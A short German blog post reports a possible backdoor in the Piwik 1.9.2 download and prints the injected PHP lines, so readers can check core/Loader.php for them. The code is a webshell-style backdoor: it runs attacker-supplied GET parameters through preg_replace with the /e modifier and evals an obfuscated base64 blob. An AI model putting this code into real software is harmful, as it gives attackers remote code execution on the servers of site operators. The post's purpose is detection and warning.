ein Blog übers Web, IT, Linux, Techiekram...

Piwik eventuell infiziert

Piwik Screenshot miradlo bloggtvia Dentaku las ich gerade bei Florian, dass seit gestern eventuell infizierte Dateien auf dem Server waren. Inzwischen kann bereits nichts mehr passieren, das Piwik-Team hat die Downloadseite im Moment geschlossen.

Auch heise berichtet über die möglicherweise entstandene Hintertür.

Wer kürzlich das Update auf 1.9.2 gemacht hat, sollte vorsichtshalber prüfen, ob in der Datei

piwik/core/Loader.php

folgende Zeilen enthalten sind:
 if(isset($_GET['g']) && isset($_GET['s'])) {literal}{
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}{/literal}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ'))); 

Noch keine Kommentare

Kommentar schreiben

Gravatar, Twitter, Favatar Autoren-Bilder werden unterstützt.
Die angegebene E-Mail-Adresse wird nicht dargestellt, sondern nur für eventuelle Benachrichtigungen verwendet.
Um einen Kommentar hinterlassen zu können, erhalten Sie nach dem Kommentieren eine E-Mail mit Aktivierungslink an ihre angegebene Adresse.
BBCode-Formatierung erlaubt
Standard-Text Smilies wie :-) und ;-) werden zu Bildern konvertiert.